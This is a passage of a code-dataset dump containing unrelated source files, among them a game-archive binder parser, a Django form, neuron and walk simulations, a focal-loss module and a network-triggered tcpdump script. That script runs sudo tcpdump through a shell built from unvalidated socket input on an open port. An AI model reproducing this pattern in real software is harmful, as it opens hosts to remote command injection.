`Binder` class from source type: {binder_source}\")\n\n @property\n def entries(self) -> tp.List[BinderEntry]:\n \"\"\"Returns an ordered list of BND entries, unpacked with the `entry_class` given to the constructor.\"\"\"\n return self._entries\n\n @property\n def entries_by_id(self) -> tp.Dict[int, BinderEntry]:\n \"\"\"Dictionary mapping entry IDs to entries.\n\n If there are multiple entries with the same ID in the BND, this will raise a `ValueError`. This should never\n happen; if it does, fix it by accessing the culprit entries with `.entries` and changing one or more IDs.\n \"\"\"\n entries = {}\n for entry in self._entries:\n if entry.id in entries:\n raise BinderError(f\"There are multiple entries with ID {entry.id}.\")\n entries[entry.id] = entry\n return entries\n\n @property\n def entries_by_path(self) -> tp.Dict[str, BinderEntry]:\n \"\"\"Dictionary mapping entry paths to (classed) entries.\n\n The same path and/or basename may appear in multiple paths in a BND (e.g. vanilla 'item.msgbnd' in Dark Souls\n Remastered). 
If it does, this property will raise an exception.\n \"\"\"\n entries = {}\n for entry in self._entries:\n if entry.path in entries:\n raise ValueError(f\"Path '{entry.path}' appears in multiple `BNDEntry` paths.\")\n entries[entry.path] = entry\n return entries\n\n @property\n def entries_by_basename(self) -> tp.Dict[str, BinderEntry]:\n \"\"\"Dictionary mapping entry basenames to (classed) entries.\n\n The same path and/or basename may appear in multiple paths in a BND (e.g. vanilla 'item.msgbnd' in Dark Souls\n Remastered). If it does, this property will raise an exception.\n \"\"\"\n entries = {}\n for entry in self._entries:\n if entry.name in entries:\n raise ValueError(f\"Basename '{entry.name}' appears in multiple BND entry paths.\")\n entries[entry.name] = entry\n return entries\n\n @property\n def entry_count(self) -> int:\n return len(self._entries)\n\n @property\n def has_repeated_entry_names(self):\n entry_names = [e.name for e in self.entries]\n return len(set(entry_names)) < len(entry_names)\n\n def __getitem__(self, id_or_path_or_basename) -> BinderEntry:\n \"\"\"Shortcut for access by ID (int) or path (str) or basename (str).\n\n If the path of one entry is the basename of another entry, the former will be given precedence here, but this\n should never happen.\n \"\"\"\n if isinstance(id_or_path_or_basename, int):\n return self.entries_by_id[id_or_path_or_basename]\n elif isinstance(id_or_path_or_basename, str):\n try:\n return self.entries_by_path[id_or_path_or_basename]\n except KeyError:\n return self.entries_by_basename[id_or_path_or_basename]\n raise TypeError(\"`BND` key should be an entry ID (int) or path/basename (str).\")\n\n def __iter__(self) -> tp.Iterator[BinderEntry]:\n return iter(self._entries)\n\n def __len__(self):\n return len(self._entries)\n\n\nclass BinderHashTable:\n\n HASH_TABLE_HEADER = BinaryStruct(\n \"8x\",\n (\"path_hashes_offset\", \"q\"),\n (\"hash_group_count\", \"I\"),\n (\"unknown3\", \"i\", 0x00080810),\n )\n PATH_HASH_STRUCT = BinaryStruct(\n (\"hashed_value\", \"I\"),\n (\"entry_index\", \"i\"),\n )\n HASH_GROUP_STRUCT = BinaryStruct(\n (\"length\", \"i\"),\n (\"index\", \"i\"),\n )\n\n @classmethod\n def build_hash_table(cls, entries):\n \"\"\" Some BND4 resources include tables of hashed entry paths, which aren't needed to read file contents, but\n need to be re-hashed to properly pack the file in case any paths have changed (or the number of entries). 
\"\"\"\n\n # Group count set to first prime number greater than or equal to the number of entries divided by 7.\n for p in range(len(entries) // 7, 100000):\n if cls.is_prime(p):\n group_count = p\n break\n else:\n raise ValueError(\"Hash group count could not be determined.\")\n\n hashes = []\n hash_lists = [[] for _ in range(group_count)] # type: tp.List[tp.List[tp.Tuple[int, int]], ...]\n\n for entry_index, entry in enumerate(entries):\n hashes.append(cls.path_hash(entry.path))\n list_index = hashes[-1] % group_count\n hash_lists[list_index].append((hashes[-1], entry_index))\n\n for hash_list in hash_lists:\n hash_list.sort() # Sort by hash value.\n\n hash_groups = []\n path_hashes = []\n\n total_hash_count = 0\n for hash_list in hash_lists:\n first_hash_index = total_hash_count\n for path_hash in hash_list:\n path_hashes.append({\"hashed_value\": path_hash[0], \"entry_index\": path_hash[1]})\n total_hash_count += 1\n hash_groups.append({\"index\": first_hash_index, \"length\": total_hash_count - first_hash_index})\n\n packed_hash_groups = cls.HASH_GROUP_STRUCT.pack_multiple(hash_groups)\n packed_hash_table_header = cls.HASH_TABLE_HEADER.pack(\n path_hashes_offset=cls.HASH_TABLE_HEADER.size + len(packed_hash_groups), hash_group_count=group_count,\n )\n packed_path_hashes = cls.PATH_HASH_STRUCT.pack_multiple(path_hashes)\n\n return packed_hash_table_header + packed_hash_groups + packed_path_hashes\n\n @staticmethod\n def path_hash(path_string: str):\n \"\"\"Simple string-hashing algorithm used by FROM.\n\n Strings use forward-slash path separators and always start with a forward slash.\n \"\"\"\n hashable = path_string.replace(\"\\\\\", \"/\")\n if not hashable.startswith(\"/\"):\n hashable = \"/\" + hashable\n h = 0\n for i, s in enumerate(hashable):\n h += i * 37 + ord(s)\n return h\n\n @staticmethod\n def is_prime(p):\n if p < 2:\n return False\n if p == 2:\n return True\n if (p % 2) == 0:\n return False\n for i in range(3, p // 2, 2):\n if (p % i) == 0:\n return False\n if i ** 2 > p:\n return True\n return True\n","sub_path":"soulstruct/containers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":15869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"127811850","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.safestring import mark_safe\nfrom .models import CourseType\nfrom .models import CourseAttendee\nfrom .models import Attendee\nfrom captcha.fields import CaptchaField\n\n\nclass RegistrationForm(forms.Form):\n\n captcha = CaptchaField(help_text=\"Opište text na obrázku.\")\n\n name = forms.CharField(\n label=_('Jméno a příjmení'), max_length=255,\n help_text=\"\"\"Jméno a příjmení včetně titulů.\"\"\")\n\n email_attendee = forms.EmailField(\n label=_('E-mail účastníka'),\n help_text='''Prostřednictvím tohoto e-mailu s Vámi\n budeme řešit organizační záležitosti kurzu.''')\n\n organisation = forms.CharField(\n required=False, max_length=100, label=_('Organizace'))\n\n street = forms.CharField(label=_('Ulice a číslo popisné'),\n max_length=50)\n\n city = forms.CharField(label=_('Město'), max_length=50)\n\n zip_code = forms.CharField(label=_('PSČ'), max_length=10)\n\n ico = forms.CharField(label=_('IČ'), required=False, max_length=12)\n\n dic = forms.CharField(label=_('DIČ'), required=False, max_length=16)\n\n order = forms.CharField(label=_('Číslo objednávky'), required=False,\n max_length=16)\n\n invoicemail = forms.EmailField(\n 
label=_('Fakturační e-mail'), required=False,\n help_text=\"Pokud se liší od e-mailu účastníka.\")\n\n student = forms.BooleanField(\n required=False,\n label=_('Student'),\n help_text=\"Prohlašuji čestně, že jsem student zapsaný v denním studijním programu.\")\n\n level = forms.ChoiceField(\n label=_('V oblasti GIS se považuji za'),\n choices=CourseAttendee.level_choices\n )\n\n topics = forms.CharField(\n label=_('Témata na tento kurz'), required=False,\n widget=forms.Textarea,\n help_text=\"Máte nějaké téma, které byste rádi na kurzu probrali?\")\n\n next_topics = forms.CharField(\n label=_('Témata na další kurzy'), required=False,\n widget=forms.Textarea,\n help_text=\"Zajímá Vás nějaký širší okruh, na který jsme zatím nevypsali školení?\")\n\n note = forms.CharField(\n label=_('Poznámka pro organizátory'), required=False,\n widget=forms.Textarea,\n help_text=\"Cokoliv nám chcete sdělit.\")\n\n gdpr = forms.BooleanField(\n label=Attendee.gdpr_label,\n help_text=Attendee.gdpr_text)\n\n marketing = forms.BooleanField(\n required=False,\n label=Attendee.marketing_label,\n help_text=Attendee.marketing_text)\n\n contact_fieldset = (name, email_attendee)\n","sub_path":"registration/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"128950522","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 20 20:36:58 2015\n\n@author: Tanguy\n\"\"\"\n\n#%% Libraries\nfrom math import exp\nimport numpy as np\n\nfrom methods import euler, rungeKutta\nimport matplotlib.pyplot as plt\n\n#%% Constants\ngNa, gK, gL, ENa, EK, EL = 120, 36, .3, 115, -12, 10.6\nI = 10\n\n#%% Function used for approximation\nfunc = euler\n\n#%% Time set up\ntimeStep = 0.01\ntimeStart = 0\ntimeStop = 200\n\ninterval = np.arange(timeStart, timeStop+timeStep, timeStep)\n\n#%% Targets set up\nv = np.zeros(len(interval))\nm = np.zeros(len(interval))\nn = np.zeros(len(interval))\nh = np.zeros(len(interval))\n\n#%% Targets initialization\nm[0], n[0], h[0] = 0.05, 0.6, 0.32\nv[0] = -15\n\n#%%\ndef computeGreeks(v):\n alphaM = (2.5 - 0.1 * v) / (exp(2.5 - 0.1 * v) - 1)\n betaM = 4 * exp(-1 * v / 18)\n \n alphaN = (0.1 - 0.01 * v) / (exp(1 - 0.1 * v) - 1)\n betaN = 0.125 * exp(-1 * v / 80)\n \n alphaH = 0.07 * exp(-1 * v / 20)\n betaH = 1 / (exp(3 - 0.1 * v) + 1)\n \n return alphaM, betaM, alphaN, betaN, alphaH, betaH\n\n#%%\ndef computeFlows(v, m, n, h, timeStep):\n \n alphaM, betaM, alphaN, betaN, alphaH, betaH = computeGreeks(v)\n \n m1 = (alphaM * (1 - m) - betaM * m)\n n1 = (alphaN * (1 - n) - betaN * n)\n h1 = (alphaH * (1 - h) - betaH * h)\n \n m = func(m, m1, timeStep)\n n = func(n, n1, timeStep)\n h = func(h, h1, timeStep)\n \n return m, n, h\n\n#%%\ndef stepUpdate(v, m, n, h, timeStep):\n m, n, h = computeFlows(v, m, n, h, timeStep)\n\n IK = gNa * m**3 * h * (v - ENa) + gK * n **4 * (v - EK) + gL * (v - EL)\n v1 = I - IK\n\n v = func(v, v1, timeStep)\n \n return v, m, n, h\n \n#%%\nfor t in xrange(1, len(interval)):\n v[t], m[t], n[t], h[t] = stepUpdate(v[t-1], m[t-1], n[t-1], h[t-1], timeStep)\n\n#%%\nplt.plot(interval, v , 'b')\nplt.show()\n\n","sub_path":"Lab 1/Hodgkin-Huxley.py","file_name":"Hodgkin-Huxley.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394590970","text":"#!/usr/bin/python3\n\nimport json\nimport datetime\n\n\ndef compute_and_normalize_domains_bias(dom2users:dict, seeds:list) 
-> dict:\n\ts_users = []\n\tfor s in seeds:\n\t\ts_users.append(set(dom2users[s]))\n\n\tmax_bias = 0\n\tdom2bias = {}\n\tfor dom, d_users in dom2users.items():\n\t\tif dom in seeds: continue\n\t\tbias = 0\n\t\tfor s in s_users:\n\t\t\tsimilarity = len(s & set(d_users))\n\t\t\tif similarity>bias: bias = similarity\n\t\tdom2bias[dom] = bias\n\t\tif bias>max_bias: max_bias=bias\n\n\tfor dom in dom2bias.keys():\n\t\tdom2bias[dom] /= max_bias\n\n\treturn dom2bias\n\n\nif __name__ == '__main__':\n\tprint(datetime.datetime.now())\n\twith open('dataset/seed_domains.json', 'r') as seeds_file:\n\t\tseeds = json.loads(seeds_file.read())\n\t\n\twith open('dataset/295k_min_0/dom2users.json', 'r') as doms_file:\n\t\tdom2users = json.loads(doms_file.read())\n\n\tdom2bias = compute_and_normalize_domains_bias(dom2users, seeds)\n\n\twith open('dataset/295k_min_0/dom2bias.json', 'w') as bias_file:\n\t\tbias_file.write(json.dumps(dom2bias))\n\tprint(datetime.datetime.now())\n\t\t","sub_path":"bias.py","file_name":"bias.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"173236365","text":"from cinline import inline\nfrom array import array\nfrom random import shuffle\n\ndef main():\n data = array('h', range(10000));\n shuffle(data)\n\n inline(\n '#include ',\n r'''\n int64 len = python->getint64(\"len(data)\");\n short* data = (short*)python->getwriteptr(\"data\");\n\n // gcc supports nested functions\n int compare(const void* pa, const void* pb) {\n short aa = *(short*)pa;\n short bb = *(short*)pb;\n if (aa < bb) return -1;\n if (aa > bb) return +1;\n return 0;\n }\n\n qsort(data, len, sizeof(short), compare);\n '''\n )\n for ii in range(10000):\n assert data[ii] == ii\n \n\nif __name__ == '__main__':\n import sys\n main(*sys.argv[1:])\n\n\n","sub_path":"unit/nestedfun.py","file_name":"nestedfun.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433253426","text":"from tensorflow import keras\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\nclass mlmodel():\r\n\tdef __init__(self):\r\n\t\tself.team = \"Los voladores de Papantla\"\r\n\t\tself.name = \"Hentai Lover De Durango\"\r\n\t\tself.model = keras.models.load_model(\"Aver128.model\",compile=False)\r\n\t\tself.labels = [\"Apple\",\"Banana\",\"Orange\",\"Mixed\"]\r\n\r\n\tdef predict(self,path = \"Appleasa.jpg\"):\r\n\t\ttop,right,bottom,left = (0,0,0,0)\r\n\t\tcoords = (top,right,bottom,left)\r\n\r\n\t\ttry:\r\n\t\t\tim = Image.open(path).convert('L')\r\n\t\t\tim = im.resize((128,128))\r\n\t\t\tnp_im = np.array(im) # convert to array\r\n\t\t\tnp_im = np_im.reshape(-1,128,128,1)\r\n\r\n\t\t\tprediction = self.model.predict(np_im)\r\n\t\t\tpredicted_fruits = []\r\n\t\t\tfor i in range(0,4):\r\n\t\t\t\tpredicted_fruits.append((self.labels[i],prediction[0,i],coords))\r\n\t\t\treturn predicted_fruits\r\n\t\texcept:\r\n\t\t\treturn None\r\n","sub_path":"mlmodel128.py","file_name":"mlmodel128.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"309427078","text":"import multiprocessing.pool\r\nimport os\r\nimport time\r\nimport sys\r\n\r\n#want each lineto read \"/a/b/c/file.root\" \"/d/e/f/file2.root\"\r\nfname = sys.argv[1] \r\nRunNumber = sys.argv[2]\r\ncontent_array = []\r\n\r\nwith open(fname) as f:\r\n\t#Content_list is the list that contains the read lines. 
\r\n\tfor line in f:\r\n\t\t\tline = line.strip() #removes the newline character insereted by append which messses up how this code creates the .sh\r\n\t\t\tif line:\r\n\t\t\t\tcontent_array.append(line) \r\n\tprint(content_array)\r\n\r\ncommands = []\r\nfor rootfiles in range(len(content_array)):\r\n\r\n\tsubmit_command = \"hadd \" + \"MergedTracksandRXNPlane_\" + str(RunNumber) + \"_\" + str(rootfiles) + \".root\" + \" \" + str(content_array[rootfiles])\r\n\tcommands.append(submit_command)\r\n\t# os.system(submit_command)\r\n\r\nworkchunks = os.cpu_count()\r\nwith multiprocessing.pool.Pool(workchunks) as p:\r\n\tcount = 1\r\n\tfor job in p.imap_unordered(os.system, commands, chunksize=workchunks):\r\n\t\tprint(\"Job {}/{} completed\".format(count, len(commands)))\r\n\t\tcount += 1","sub_path":"Parallelization_Software/Merging_Track_and_RXN/HADD_Tracks_and_RXN_Plane.py","file_name":"HADD_Tracks_and_RXN_Plane.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"135837888","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated by PyCharm.\n\n@Date : Wed Dec 18 2019 \n@Time : 23:15:53\n@File : dual_focal_loss.py.py\n@Author : alpha\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..registry import LOSSES\n\n\ndef dual_focal_loss_old(pred, label, reduction='mean', avg_factor=None):\n \"\"\"\n :param pred:\n :param label:\n :param reduction:\n :param avg_factor:\n :return:\n \"\"\"\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n loss = torch.abs(label - pred.sigmoid()) + F.binary_cross_entropy_with_logits(pred, label, reduction='none')\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n if avg_factor is None:\n return loss.mean()\n else:\n return loss.sum() / avg_factor\n else:\n return loss.sum()\n\n\ndef dual_focal_loss_proto(pred, label, reduction='mean', avg_factor=None):\n \"\"\"\n :param pred: logits\n :param label: 0~1 floats\n :param reduction: 'none', 'sum', 'mean'\n :param avg_factor:\n :return: loss\n dfl = abs(label - pred.sigmoid()) - log(1 - abs(label - pred.sigmoid()))\n \"\"\"\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n pred_sigmoid = pred.sigmoid()\n l1 = torch.abs(label - pred_sigmoid)\n loss = l1 - (1.0 - l1).log()\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n if avg_factor is None:\n return loss.mean()\n else:\n return loss.sum() / avg_factor\n else:\n return loss.sum()\n\n\ndef dual_focal_loss(pred, label, reduction='mean', avg_factor=None):\n \"\"\"\n :param pred: logits\n :param label: 0~1 floats\n :param reduction: 'none', 'sum', 'mean'\n :param avg_factor:\n :return: loss\n dfl = abs(label - pred.sigmoid()) - log(1 - abs(label - pred.sigmoid()))\n \"\"\"\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n pred_sigmoid = pred.sigmoid()\n l1 = torch.abs(label - pred_sigmoid)\n sigmoid_inv = 1.0 + (-pred).exp()\n item = torch.where(label > pred_sigmoid,\n sigmoid_inv * (1 - label) + 1,\n sigmoid_inv * (1 + label) - 1)\n loss = l1 - item.log() + sigmoid_inv.log()\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n if avg_factor is None:\n return loss.mean()\n else:\n return loss.sum() / avg_factor\n else:\n return loss.sum()\n\n\ndef _random_mask(tensor, percent):\n assert percent > 0\n return (torch.rand_like(tensor) < percent).float()\n\n\ndef 
balanced_dual_focal_loss(pred, label, neg_pos_ratio=4, least_neg_pct=0.05, reduction='mean'):\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n mask_pos = (label > 0).float()\n rand_pct = mask_pos.sum() / mask_pos.nelement()\n neg_pct = (rand_pct * (neg_pos_ratio + 1)).clamp(least_neg_pct)\n mask = 1.0 + ((_random_mask(label, neg_pct) + mask_pos) > 0).float()\n mask /= mask.mean()\n loss = dual_focal_loss(pred, label, reduction='none') * mask\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n return loss.mean()\n else:\n return loss.sum()\n\n\n@LOSSES.register_module\nclass DualFocalLoss(nn.Module):\n\n def __init__(self,\n balance_sample=True,\n neg_pos_ratio=4,\n least_neg_pct=0.05,\n use_one_hot_label=True,\n num_classes=81,\n reduction='mean',\n loss_weight=1.0):\n super(DualFocalLoss, self).__init__()\n self.balance_sample = balance_sample\n self.neg_pos_ratio = neg_pos_ratio\n self.least_neg_pct = least_neg_pct\n self.use_one_hot_label = use_one_hot_label\n self.num_classes = num_classes\n self.reduction = reduction\n if self.use_one_hot_label:\n self.loss_weight = loss_weight * (num_classes - 1)\n else:\n self.loss_weight = loss_weight\n\n def forward(self, pred, label,\n weight=None,\n avg_factor=None,\n reduction_override=None):\n assert reduction_override in (None, 'none', 'mean', 'sum')\n reduction = (reduction_override if reduction_override else self.reduction)\n if self.use_one_hot_label:\n pred = pred.flatten()\n label = F.one_hot(label, num_classes=self.num_classes)[..., 1:].flatten()\n if self.balance_sample:\n return self.loss_weight * balanced_dual_focal_loss(\n pred, label,\n neg_pos_ratio=self.neg_pos_ratio,\n least_neg_pct=self.least_neg_pct,\n reduction=reduction\n )\n else:\n return self.loss_weight * dual_focal_loss(\n pred, label,\n reduction=reduction,\n avg_factor=avg_factor\n )","sub_path":"mmdet/models/losses/dual_focal_loss.py","file_name":"dual_focal_loss.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"9862066","text":"import numpy as np \nallwalks = []\ndef recursiveWalk(x, y, j, this_list):\n # x and y are the coordinates of the starting point.\n # j is the number of steps left.\n # x and y are positive integers.\n Total = 0\n # Add the current point to list.\n # this_list.append([x,y])\n if j == 0:\n # Successfully reached a self-avoiding walk of the desired length\n #if len(this_list) == len(set(this_list)): \n # z = this_list.count([2,2])\n # if z <= 2: \n Total = Total + 1\n allwalks.append(this_list)\n else: # Check what directions are possible to continue walking\n if j: # At the beginning \n # start off with all vertices having a value of 0\n lattice = np.zeros([x+y+1, x+y+1]) \n # let the starting vertex have a value of 1\n for i in range(len(this_list)):\n lattice[this_list[i][0], this_list[i][1]] = 1\n this_list.append([x,y])\n print(this_list)\n #if lattice[x, y] < 2:\n # lattice[x, y] = lattice[x, y] + 1\n # recursiveWalk(x, y, j - 1, this_list[:])\n if lattice[x + 1, y] < 2:\n lattice[x + 1, y] = lattice[x + 1, y] + 1\n this_list.append([x + 1, y])\n # print(this_list)\n recursiveWalk(x + 1, y, j - 1, this_list[:])\n if lattice[x - 1, y] < 2:\n lattice[x - 1, y] = lattice[x - 1, y] + 1\n this_list.append([x - 1, y])\n #print(this_list)\n recursiveWalk(x - 1, y, j - 1, this_list[:])\n if lattice[x, y + 1] < 2:\n lattice[x, y + 1] = lattice[x, y + 1] + 1\n this_list.append([x, y + 1])\n 
#print(this_list)\n recursiveWalk(x, y + 1, j - 1, this_list[:]) \n if lattice[x, y - 1] < 2:\n lattice[x, y - 1] = lattice[x, y - 1] + 1\n this_list.append([x, y - 1])\n #print(this_list)\n recursiveWalk(x, y - 1, j - 1, this_list[:])\n\n# example \n# x and y must be greater than or equal to j.\n# j - number of steps\n# x,y is the starting point.\nrecursiveWalk(2,2,2,[])\n# length of walk\nprint(\"Number of total walks: \", len(allwalks))\nprint(\"\\nThe walks: \")\n# print each walk\nfor i in range(len(allwalks)):\n print(allwalks[i])\n","sub_path":"L.py","file_name":"L.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"40822393","text":"import traceback\r\nimport json\r\nimport socket\r\nimport time\r\nimport subprocess\r\nclass listenfrom(object):\r\n def __init__(self):\r\n self.host = ''\r\n self.port = 5000\r\n self.sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n self.sock.bind((self.host,self.port))\r\n self.sock.listen(10)\r\n def getinfo(self):\r\n while True:\r\n self.conn, self.addr=self.sock.accept()\r\n self.data=self.conn.recv(4096)\r\n if (self.data.split(',')[0].strip() == 'CAP'):\r\n self.time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime(time.time()))\r\n if self.data.split(',')[1].strip() == '':\r\n self.srcadd = ''\r\n else: \r\n self.srcadd = 'src net '+self.data.split(',')[1].strip()+' and '\r\n if self.data.split(',')[2].strip() == '':\r\n self.srcport = ''\r\n else:\r\n self.srcport = 'src portrange '+self.data.split(',')[2].strip()+' and '\r\n if self.data.split(',')[3].strip() == '':\r\n self.dstadd = ''\r\n else:\r\n self.dstadd = 'dst net '+self.data.split(',')[3].strip()\r\n if self.data.split(',')[4].strip() == '':\r\n self.dstport = ''\r\n else: \r\n self.dstport = ' and dst portrange '+self.data.split(',')[4].strip()\r\n if self.data.split(',')[5].strip() == '':\r\n self.count = '200'\r\n else:\r\n self.count = self.data.split(',')[5].strip()\r\n self.capture = 'sudo timeout 60 tcpdump -i any -s 0 '+self.srcadd+self.srcport+self.dstadd+self.dstport+' -c '+self.count+' -w '+'/tmp/'+self.time\r\n self.syntax = 'The Syntax is --- sudo timeout 60 tcpdump -i any -s 0 '+self.srcadd+self.srcport+self.dstadd+self.dstport+' -c '+self.count+' , The filename is --- '+self.time+' in '+str(setting['region'])+'/'+str(setting['idc'])+' folder '\r\n self.conn.sendall(self.syntax)\r\n self.conn.close()\r\n self.cap = subprocess.Popen(self.capture, shell=True)\r\n self.cap.wait()\r\n self.target = 'sudo scp /tmp/'+self.time+' username@target-address:/tmp/capture/'+str(setting['region'])+'/'+str(setting['idc'])\r\n self.send = subprocess.Popen(self.target, shell=True)\r\n self.send.wait()\r\n self.conn.close()\r\n#Define the main function\r\nif __name__ == '__main__':\r\n f = open(\"/home/ops/wuwh/Settings.json\")\r\n setting = json.load(f)\r\n f.close()\r\n capture = listenfrom()\r\n capture.getinfo()","sub_path":"20180511CAP.py","file_name":"20180511CAP.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"274324536","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\n\nfrom celery.contrib.abortable import AbortableTask\nfrom django.conf import settings\nfrom livesettings import config_value\n\nfrom panda import solr\nfrom panda.utils.mail import send_mail\n\nSOLR_ADD_BUFFER_SIZE = 500\n\nclass ImportFileTask(AbortableTask):\n \"\"\"\n Base type for file 
import tasks. \n \"\"\"\n abstract = True\n\n # All subclasses should be within this namespace\n name = 'panda.tasks.import'\n\n def task_start(self, task_status, message):\n \"\"\"\n Mark that task has begun.\n \"\"\"\n task_status.status = 'STARTED' \n task_status.start = datetime.utcnow()\n task_status.message = message \n task_status.save()\n\n def task_update(self, task_status, message):\n \"\"\"\n Update task status message.\n \"\"\"\n task_status.message = message \n task_status.save()\n\n def task_abort(self, task_status, message):\n \"\"\"\n Mark that task has aborted.\n \"\"\"\n task_status.status = 'ABORTED'\n task_status.end = datetime.utcnow()\n task_status.message = message\n task_status.save()\n\n def task_complete(self, task_status, message):\n \"\"\"\n Mark that task has completed.\n \"\"\"\n task_status.status = 'SUCCESS'\n task_status.end = datetime.utcnow()\n task_status.message = message\n task_status.save()\n\n def task_exception(self, task_status, message, formatted_traceback):\n \"\"\"\n Mark that task raised an exception\n \"\"\"\n task_status.status = 'FAILURE'\n task_status.end = datetime.utcnow()\n task_status.message = message \n task_status.traceback = formatted_traceback\n task_status.save()\n\n def run(self, dataset_slug, upload_id, *args, **kwargs):\n \"\"\"\n Execute import.\n \"\"\"\n raise NotImplementedError() \n\n def after_return(self, status, retval, task_id, args, kwargs, einfo):\n \"\"\"\n Save final status, results, etc.\n \"\"\"\n from panda.models import Dataset, Notification\n\n dataset = Dataset.objects.get(slug=args[0])\n task_status = dataset.current_task \n\n if einfo:\n self.task_exception(\n task_status,\n 'Import failed',\n u'\\n'.join([einfo.traceback, unicode(retval)])\n )\n \n email_subject = 'Import failed: %s' % dataset.name\n email_message = 'Import failed: %s:\\n\\nhttp://%s/#dataset/%s' % (dataset.name, config_value('DOMAIN', 'SITE_DOMAIN'), dataset.slug)\n notification_message = 'Import failed: %s' % dataset.name\n notification_type = 'Error'\n elif self.is_aborted():\n email_subject = 'Import aborted: %s' % dataset.name\n email_message = 'Import aborted: %s:\\n\\nhttp://%s/#dataset/%s' % (dataset.name, config_value('DOMAIN', 'SITE_DOMAIN'), dataset.slug)\n notification_message = 'Import aborted: %s' % dataset.name\n notification_type = 'Info'\n else:\n self.task_complete(task_status, 'Import complete')\n \n email_subject = 'Import complete: %s' % dataset.name\n email_message = 'Import complete: %s:\\n\\nhttp://%s/#dataset/%s' % (dataset.name, config_value('DOMAIN', 'SITE_DOMAIN'), dataset.slug)\n notification_message = 'Import complete: %s' % dataset.name\n notification_type = 'Info'\n \n if task_status.creator:\n Notification.objects.create(\n recipient=task_status.creator,\n related_task=task_status,\n related_dataset=dataset,\n message=notification_message,\n type=notification_type\n )\n\n send_mail(email_subject, email_message, [task_status.creator.username])\n\n # If import failed, clear any data that might be staged\n if task_status.status == 'FAILURE':\n solr.delete(settings.SOLR_DATA_CORE, 'dataset_slug:%s' % args[0], commit=True)\n\n","sub_path":"panda/tasks/import_file.py","file_name":"import_file.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"197330744","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nfrom datetime import datetime, timedelta\nfrom os import utime\nfrom re import 
compile as regex\nfrom six.moves import zip_longest\nfrom tempfile import NamedTemporaryFile\nfrom unittest import TestCase as _TestCase\n\n\nclass TestCase(_TestCase):\n def assert_are_true(self, actual):\n self._assert_all_are(True, actual)\n\n def assert_are_false(self, actual):\n self._assert_all_are(False, actual)\n\n def _assert_all_are(self, expected, actual):\n from itertools import repeat\n actual = tuple(actual)\n l = actual.__len__()\n expected = repeat(expected, l)\n self.assert_are(expected, actual)\n\n def assert_are(self, expected, actual):\n from operator import is_\n self._are(is_, expected, actual)\n\n def assert_are_eq(self, expected, actual):\n from operator import eq\n self._are(eq, expected, actual)\n\n def assert_are_eq_strict(self, expected, actual, true=True):\n unique = object()\n z = zip_longest(expected, actual, fillvalue=unique)\n z = tuple(z)\n len_ = z.__len__()\n types_are = tuple((e.__class__ is a.__class__) for e, a in z)\n values_are = tuple((e == a) for e, a in z)\n expected = (True,) * len_, (true,) * len_\n actual = types_are, values_are\n self.assertEqual(expected, actual)\n\n def _are(self, op, expected, actual):\n expected = tuple(expected)\n _0 = (True,) * expected.__len__()\n _1 = self.cmp(op, expected, actual)\n self.assertEqual(_0, _1)\n\n @staticmethod\n def cmp(op, expected, actual):\n unique = object()\n z = zip_longest(expected, actual, fillvalue=unique)\n z = tuple(z)\n return tuple(op(p, q) for p, q in z)\n\n @staticmethod\n def args(*args):\n return map(str, args)\n","sub_path":"pypeline/test/yobj/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"267718038","text":"import os\nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport numpy as np\nimport sys\n\nfrom hybrid_data_provider import data_provider\nfrom tensorflow.contrib import learn\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\n\n# Parameters\nlearning_rate = float(sys.argv[8])\nmy_droup_out = float(sys.argv[9])\nbatch_size = 200\nnumber_of_post_per_user = int(sys.argv[2])\ntrain_iteration = int(sys.argv[3])\nn_word_embedding = 